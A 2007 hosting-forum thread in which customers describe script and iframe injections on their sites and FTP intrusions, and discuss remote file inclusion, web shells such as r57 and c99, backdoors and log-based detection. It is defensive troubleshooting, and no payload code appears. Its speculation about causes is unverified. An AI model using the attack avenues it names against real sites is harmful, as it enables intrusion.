Lunarpages Web Hosting Forum

Author Topic: Security Issue with Multiple Hosting Accounts (8/28/2007 - 9/14/2007)  (Read 21769 times)

Offline eemerton

  • Newbie
  • *
  • Posts: 5
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #30 on: September 04, 2007, 09:35:58 AM »
This is more widespread -- NOT just php, also JSP.  -- Every single page on my sites at LP of form - index.jsp, index.html, main.jsp, login.jsp -- all had this stuff inserted on Sept 2nd at 1:13 PM.   A <script></script> piece right after <body> -- or at the bottom of the files if they didnt contain a <body>.    Not sure what the stuff does, but its a bunch of URLs to csufresno.edu.  Pages I havent touched in months or years - and accross about 15 sub directories of my public_html main directory.    I alerted LP through a support ticket.   I'm on the spica server.

Offline JJ

  • Trekkie
  • **
  • Posts: 18
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #31 on: September 04, 2007, 11:46:54 AM »
As I said previously, I have password protected all web directories and have changed all my passwords. I will monitor for a couple of days to see if any other pages get changed.

I have to ask the question again though: How is this happening?! Is it purely because passwords have been guessed?

Offline Peak

  • Spacescooter Operator
  • *****
  • Posts: 44
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #32 on: September 04, 2007, 12:02:56 PM »
No guessed passwords for me. They logged into 2 of my accounts with ftp and changed all index.php-files.

I would suspect that the only thing possible is that logins have leaked somewhere.

My reasoning:

Before we bought the dedicated server, two of our accounts was hosted on LP with the same password as we continued with when we moved the two accounts to a dedicated server. And then we created a third account. Account 1 and 2 was hacked almost simultanious, the third one (which LP doesn't have the PW for) remained unchanged.

Either that, or there's some hole in apache or something. Can't be CPanel. We use Webmin.

This theory is only a theory, though. It may be correct, it may be completely wrong. They may have hacked my server due to some unsecure script on my part. It's difficult to search all the logs due to all the data in them.
« Last Edit: September 04, 2007, 12:04:53 PM by Peak »
//Peak

Offline JJ

  • Trekkie
  • **
  • Posts: 18
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #33 on: September 04, 2007, 12:20:20 PM »

Before we bought the dedicated server, two of our accounts was hosted on LP with the same password as we continued with when we moved the two accounts to a dedicated server. And then we created a third account. Account 1 and 2 was hacked almost simultanious, the third one (which LP doesn't have the PW for) remained unchanged.

I have two accounts. One is PHP based, the other standard HTML. BOTH were hacked, with only (I hope) index. and login. files changed.

Very interesting what you say - so the question I now have is has anyone other than LP users experienced this problem?

Another question, and I am still trying to get my head around this, but apart from guessing my passwords, is there any other way a hack could have got in and done this?

Offline Peak

  • Spacescooter Operator
  • *****
  • Posts: 44
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #34 on: September 04, 2007, 12:30:49 PM »
Not with websites with pure html. If you hack a website, you normally have to find some way to get in though some hole in a script (php or asp or similar). Happened to me once, where a hacker succeeded in upload a script of his own that gave him full control over the account. My own fault, I hadn't updated that script. No chance of this with a html website. Nothing to include anywhere.

//Peak

Offline JJ

  • Trekkie
  • **
  • Posts: 18
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #35 on: September 04, 2007, 12:44:59 PM »
Not with websites with pure html. If you hack a website, you normally have to find some way to get in though some hole in a script (php or asp or similar). Happened to me once, where a hacker succeeded in upload a script of his own that gave him full control over the account. My own fault, I hadn't updated that script. No chance of this with a html website. Nothing to include anywhere.



OK, I bent the truth a little, I did have some PHP stuff on there, from a php forum.  :(

So, from what you are saying then it is not necessarily because my passwords have been guessed but because of some PHP scripts I have? I have a few Dreamweaver add-ons and a PHP forum (pre-written stuff). Have never had a problem with them before and have been running for a couple of years  :?

Offline SteveW

  • Master Jedi
  • *****
  • Posts: 1392
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #36 on: September 04, 2007, 12:49:23 PM »
JJ and Peak,

There are ways they can get in without knowing the password, and ways they can keep coming back even after you've changed the pw. If you search these forums on "hacked", you'll find quite a few previous threads started by other people whose sites got hacked.  It's a lot of reading; how far you get will depend on how interested you are. 

A remote file inclusion (RFI) vulnerability (a weak script that allowed them to inject their own code and "include" a file from a remote site) can allow them to upload a "shell script" into your site and run it. Some of the shell scripts that are used are well written and sophisticated (web search r57, c99), and can have basically the same effect as an .msi installer program. Have you ever watched a commercial program install itself on your computer, listing the dozens or hundreds of files as it installs them?

Once the website is compromised, the hacker can also change permissions on files and folders, install backdoor scripts that give them remote access (no passwords required, and password changes will not keep them out), download any files they want from your site, obtain the files that contain your password hashes (and then subject them to very fast offline pw-cracking methods), and on and on and on...

The fact that your site logs contain a lot of data shouldn't make it impossible to use them as a data source. If you're lucky enough to find their accesses in your FTP log, search your HTTP log for other occurrences of their IP address, especially just before the first FTP access, and going back as much as a month before that. If you find that IP address in your log, and the line looks like GET filename.ext?something=somevalue, then you have an indication that the avenue of entry might have been an RFI attack, and you also know which of your files (filename.ext) to check for weaknesses. That's just one example of the type of detective work that can be done. 

Any site that has been hacked, even "just a little bit", should be inspected carefully for non-obvious damage such as backdoor scripts that might be in out of the way places or in new subdirectories you don't know about. "Hoping" isn't a good plan! Do a thorough inspection. Since the links injected by this script are invisible, it appears that this one, like most professional hacks, was intended to go unnoticed.

That having been said, I can't say I have the slightest idea how this particular hack occurred; that's why LP staff are investigating now.  But you expressed an interest in the general concepts involved, and so the above are some of them.  There are things that you can be doing now that can assist the investigation, rather than leaving it entirely up to LP. You know your sites better than they do and have a greater ability to notice things that don't look right.

Offline Peak

  • Spacescooter Operator
  • *****
  • Posts: 44
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #37 on: September 04, 2007, 12:53:30 PM »
Not necessary. Forums is often attacked, so if you have the latest version there should be no problem. Developers of php and asp applications are aware of the risks, so they tend to make the scripts as secure as possible. If there's a vulnerability, that hole tends to be closed rather quickly and a upgrade of the script becomes available.

Therefore, it's quite important to always have the latest version of any script, in case there's some way for a hacker to get in.

But, I do stress, that there's no way I know of to get account information (ftp passwords and stuff) from hacking a website with a script. They may change things on your website, upload viruses and similar stuff, but they still works from the outside within the limits of the vulnerability.

Edit: This was a reply to JJ, but I agree with what SteveW said. And no, the IP that hacked my website was not in the apache logs. That, I have checked. And LP have checked the rest of the server and found no trojans or anything like that. Well, I changed the PW:s and so far, so good.
« Last Edit: September 04, 2007, 12:59:18 PM by Peak »
//Peak

Offline SteveW

  • Master Jedi
  • *****
  • Posts: 1392
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #38 on: September 04, 2007, 01:08:46 PM »
But, I do stress, that there's no way I know of to get account information (ftp passwords and stuff) from hacking a website with a script...
I believe that's correct. I haven't found anything in my site that looks like a hash of my cpanel/ftp password (though I could be wrong). There are hashes of email account passwords, so those could be downloaded and cracked off line. You can be sure that if they do crack it, they'll check to see if you might be using the same pw for cPanel and ftp.   

However, php provides its own ftp handling functions, so if they can get their own php script to run on your site, they have ftp access thru PHP, and don't need your ftp password. I think that's correct, but am not 100% sure, as I haven't used any of those functions myself. I found them in the PHP manual. I'd expect those accesses would also show in the ftp log, same as others, but I'm not sure of that, either. If they are logged, there might be some way to tell them apart from your own "publishing" ftp accesses, but I don't know what that would be.

Offline Peak

  • Spacescooter Operator
  • *****
  • Posts: 44
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #39 on: September 04, 2007, 01:16:31 PM »
I do think that there would be a difference between using php-functions and the ftp-server. I'm not sure, but I would think that the php-commands for uploading a file should show up in the apache log while the ftp-server activity is logged in the ftp log.
//Peak

Offline JJ

  • Trekkie
  • **
  • Posts: 18
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #40 on: September 04, 2007, 01:20:05 PM »
Steve: THANK YOU !!  :thumb: Exactly what I wanted to know. And having checked I see that I am one version below the latest phpBB release for the forum.  :notme:

Thank you too Peak for your input.  :thumb:

I plan to wipe my webserver clean to make sure it has no residue of these hacks. Then I will re-install the forum software to the latest version, restore the forum database and then open it back up for visitors. I will then keep a very close eye on the index. and login. files to see if any hacks get in.

I'll watch this for a couple of weeks and if it remains safe then I'll re-install the rest of the website. If I get attacks shortly after this then I will then at least have a rough idea that my weakness is probably going to be with my main website scripts an not my phpBB ones.

Well, I say a plan, I am sure more experienced web designers would do it differently, but it's the only way I can think of to make sure I clean everything up.

I still think though that it is kind of strange that this affected so many people all at once at LP. Is anyone aware of anyone else being affected outside of LP with this specific attack?


« Last Edit: September 04, 2007, 01:23:46 PM by JJ »

Offline SteveW

  • Master Jedi
  • *****
  • Posts: 1392
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #41 on: September 04, 2007, 01:59:31 PM »
I plan to wipe my webserver clean to make sure it has no residue of these hacks.
I gather you're on a dedicated plan?

I'm on basic shared, but that's pretty much my plan, too, if this ever happens and if the first cleanup attempt seems to fail (i.e. if there's a re-hack after the cleanup). I don't know if LP staff can "push a button" and wipe an entire site clean, not just public_html (I can empty that myself), but including "/", too, for a fresh start with all the permissions as they should be, etc., as though the site is newly created.

Quote
I'll watch this for a couple of weeks and if it remains safe then I'll re-install the rest of the website. If I get attacks shortly after this then I will then at least have a rough idea that my weakness is probably going to be with my main website scripts an not my phpBB ones.
My non-researched "impression" is that the phpBB weaknesses have been pretty serious.

Did your logs show nothing suspicious? Besides the FTP log, another place to find the time of the hack would be timestamps on modified files. And any HTTP access just prior to that moment are worth having a look at.

I'd hate to have to hold off publishing for a couple of weeks!  :smiling: True, it wouldn't inconvenience that many people, but I don't think I could stand it.

Quote
Is anyone aware of anyone else being affected outside of LP with this specific attack?

I just did a web search (Google and Live) on "watch77.com/tds", and found 4 sites showing the iframe. 3 LP and 1 at a host in Texas. Edit: 4 is a very small number, which makes this look like it must be new. A web search for similar strings from other hacks has sometimes turned up thousands of sites. I think there's a thread here from last January where someone said they found 30,000.
« Last Edit: September 04, 2007, 05:14:36 PM by SteveW »

Offline SteveW

  • Master Jedi
  • *****
  • Posts: 1392
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #42 on: September 04, 2007, 02:14:03 PM »
Before we bought the dedicated server, two of our accounts was hosted on LP with the same password as we continued with when we moved the two accounts to a dedicated server. And then we created a third account. Account 1 and 2 was hacked almost simultanious, the third one (which LP doesn't have the PW for) remained unchanged.

This theory is only a theory, though.
But it is an interesting set of circumstances. 

Did the two hacked sites have links to each other, such that a crawler might have zipped directly from one to the next and then tried using the same password on it, just in case it might work?

LP (or any host) can become a target of particularly intense attacks (of which some will succeed) without necessarily having a hole. It's possible to get (for a fee) a list of all the sites on a given server. There are people out there whose accounts were cancelled by LP for spamming, fraud, or whatever, and no doubt they aren't too happy about it.

Edit: In case you're concerned that it's not being taken seriously, though, I am sure that it is. When they say admins are looking into it, that indicates an unusual level of interest and investigation. With most site hacks, there's really not much to investigate except within the site itself, which is the responsibility of the site owner. If a bunch get hit at once, it's different.
« Last Edit: September 04, 2007, 05:24:03 PM by SteveW »

Offline SteveW

  • Master Jedi
  • *****
  • Posts: 1392
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #43 on: September 04, 2007, 06:04:17 PM »
Interesting article, "Know Your Enemy": http://www.honeynet.org/papers/webapp/

Offline JeremyD

  • SleePy...
  • Jabba the Hutt
  • *****
  • Posts: 733
  • SMF Team Member
    • LcT Tribe
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #44 on: September 04, 2007, 06:09:59 PM »
Interesting to know that FTP was used.

To me this seems like a Lunar Admin's account was comprised. Giving them access to all the customers accounts. Then they used that to look at the passwords in the database.